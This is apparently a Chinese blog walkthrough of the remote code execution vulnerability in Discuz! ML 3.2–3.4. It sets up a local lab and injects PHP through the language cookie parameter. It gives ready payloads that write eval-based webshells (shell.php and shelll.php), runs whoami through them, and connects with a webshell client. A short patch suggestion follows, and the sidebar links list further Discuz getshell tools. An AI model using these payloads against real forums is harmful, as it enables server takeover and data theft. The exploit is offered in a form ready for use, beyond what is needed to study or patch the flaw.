discuz安装_Discuz! ML RCE漏洞 getshell 复现

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量372 收藏 1
点赞数
文章标签: discuz安装
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39575502/article/details/112111429
版权
本文详细介绍了Discuz! ML的远程代码执行(RCE)漏洞,涉及版本包括V3.2、V3.3和V3.4。通过环境搭建、漏洞复现和getshell过程,展示了如何利用该漏洞执行代码并获取shell。最后提出了修改源码和安装补丁的修复建议。
摘要由CSDN通过智能技术生成

264d867bb8c1edf2f90142797e4ba3c1.gif

Discuz简介

Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区。影响版本


Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

环境搭建

phpstudy  php-7.2.10-nts Apache

discuz 3.4 源码  官网直接下载:http://discuz.ml/download 之后将源码解压到根目录

漏洞复现

右上角语言标识,随便选择一种语言并抓包

   0857ba2c5641c419b9866cf3ccb0190d.png

将抓到的包发送到repeater模块

将包中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,得到了phpinfo信息,如下图:

   6d2e55d5bac78f97e663fee53a0ceee7.png

Getshell

exp:

解码后:

'.file_put_contents('shell.php',urldecode('%3c%3fphp %20eval(%24_%47%45%54%5b%22cmd%22%5d)%3b%3f%3e')).'

解码前:

'. file_put_contents('shell.php',urldecode('')

将包中的xxxxx_language参数值改为解码后的exp,可以看到成功执行了代码,在文件夹中多出了shell.php文件,

如下图

   be93997595ddab9e74eb29ec10022125.png

查看文件upload

   2e743742fa76673b418b01c60fdc74bc.png

url后加shell.php?cmd=system('whoami');

url:http://127.0.0.1/discuz/upload/shell.php?cmd=system('whoami');

直接执行了whoami命令

   bc11b737251cff0f4f4e647b2762e966.png

Exp:

'.file_put_contents('shelll.php',urldecode('%3c%3fphp %20eval(%24_%50%4f%53%54%5b%22a1%22%5d)%3b%3f%3e')).'


原语句:

将包中cookie的xxxxx_language参数值改为exp,可以看到成功执行了代码,在文件夹中多出了shelll.php文件,

如下图

   9cd6d29fa1f7d01aa9e55b276d30f947.png

访问执行shelll.php

   868e5b711e6548ef9caa3540eea2b716.png

执行后使用菜刀连接

http://127.0.0.1/discuz/upload/shelll.php

密码:a1(可自己修改)

   7cfa3e7d4d412cb42836c62009a0582b.png

修复建议

修改source/function/function_core.php 644行为:

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php'

删除可控变量。

或者安装最新补丁。

bfa7ea609ae3c26eb98de632fa7d16ad.png

推荐文章++++

1bfea73b01a0b8c2056249aba69850e1.png

*Discuz ML RCE 漏洞批量检测利用工具

*discuz!ML 3.x代码执行漏洞的利用

*【漏洞预警】Discuz! 任意文件删除漏洞

a069fb8d8229fc6b86faa862672ccca6.png

ac1e80151a694f132dde0891a94f7f3a.gif

weixin_39575502
关注
discuz xss拿shell
Coisini的博客
05-26 1465
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
漏洞复现Discuz-x3.1 插件漏洞
weixin_47443077的博客
05-27 2101
Discuz-x3.1 插件漏洞 文章目录Discuz-x3.1 插件漏洞一、漏洞背景二、信息收集三、漏洞利用 一、漏洞背景 作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 二、信息收集 本地IIS搭建Discuz-x3.1,发现不能直接访问 进行
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
7.2 discuzshell_Discuz 7.2FAQ-GETshell
weixin_42608299的博客
02-15 533
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*-# author sbimport sysimport hashlibimport timeimport mathimport base64import urllib2import urllibimport redef s...
Discuz全局变量防御绕过导致代码执行getshell
ADummy的博客
02-05 587
Discuz 7.x/6.x 全局变量防御绕过导致代码执行 by ADummy 0x00利用路线 ​ Discuz任意帖子页面—>cookie注入命令—>命令执行(phpinfo()或eval一句话)—>getshell 0x01漏洞介绍 ​ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致$_REQUEST中不再包含$_COOKIE,我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞 ​ 影响版本 Dis
Discuz利用UC_KEY进行前台getshell
aixuan9365的博客
06-02 998
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html 先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。 先附上来源中的脚本。修改了一些代码。 <?php $timestamp = ti...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5532
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
SSRF漏洞(服务器端请求伪造)
赤赤三的博客
03-21 2193
中间人(SSRF就是中间人)攻击,服务端请求伪造,主要攻击内网,打redis和weblogic特别厉害,目标网站的内部系统(他是从内部系统访问的,所以通过它攻击外部系统无法访问的内部系统,也就是目标网站当成中间人)。 大部分漏漏洞都是参数给变量的时候没有做任何限制导致漏洞。 攻击主要结果: 写webshell(需要知道web路径,有增删改查权限,gopher协议的使用,使用工具生成gopher 攻击ssrfpayload) 反弹shell(获取操作系统命令) 原理: 根本原因: SS.
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 985
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 2616
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
gentlexue#POC-3#Discuz 3.4 最新版后台getshell1
07-25
Discuz 3.4 最新版后台getshell详情可以看这篇文章:
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
discuz uc.php漏洞利用,Discuz的利用UC_KEY进行getshell
weixin_40001048的博客
03-20 355
简要描述:知key得shell。详细说明:code 区域$configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '".addslashes($UC_API)."');", $configfile);这句代码是有漏洞的。如果我第一次提交的是code 区域\');phpinfo();define那句...
1419.ml forum.php,discuz ml RCE漏洞重现及分析
weixin_35976717的博客
03-18 510
0x00 概述7月11日,在网上发现discuz ml(多国语言版)出现RCE漏洞的消息,漏洞在于cookie的language可控并且没有严格过滤,导致可以远程代码执行。0x01 影响范围Discuz!ML v.3.4 ,Discuz!ML v.3.2 ,Discuz!ML v.3.3 product ofcodersclub.org0x02 漏洞重现让请求cookie含有xxxx_xxxx_...
home.php mod spacecp,DiscuzX3后台getshell详细利用方法图解
weixin_39567870的博客
04-04 1496
上班后看到wooyun社区发布了一个discuzx3后台拿shell的方法,随后t00ls的会员也测试了discuz x2.5的后台拿shell方法。好蛋疼的是我测试居然没过,抓到的数据包和给出的案例不一样!!!经过研究发现,步骤错了。。。。用户 ? 用户栏目 ? 栏目分组 ? 提交 ? 抓包 (我就是在这步出错的,一定要提交,不然抓到的数据包不一样)Content-Disposition:fo...
7.2 discuzshell_Discuz! 7.2 SQL注入exp(getshell版)
weixin_39616686的博客
12-22 514
已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。参数:1.可直接getshell2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。...
DZ拿shell总结
weixin_30600503的博客
01-23 783
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
Discuz! X2.5 最新GetShell0day 详细利用
weixin_33970449的博客
12-07 695
Discuz! X2.5 最新GetShell0day 详细利用听说Discuz!这次又出漏洞了,这次还是个GetShell漏洞呀。这个漏洞比较新,应该很多站还没更新吧。影响版本有:20120407,beta,rcDiscuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,在实现上存在远程命令执行漏洞,远程***者可利用此漏...
ThinkPHP 5.0.0 在严格限制下的 RCE 漏洞利用分析与 getshell 方法
"TP框架在严格限制条件下的getshell方法探讨" 在网络安全领域,尤其是Web应用安全中,"getshell"通常是指获取服务器的命令执行权限,从而能够对目标系统进行进一步的操作。本话题聚焦于在ThinkPHP(TP)5.0.0版本下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值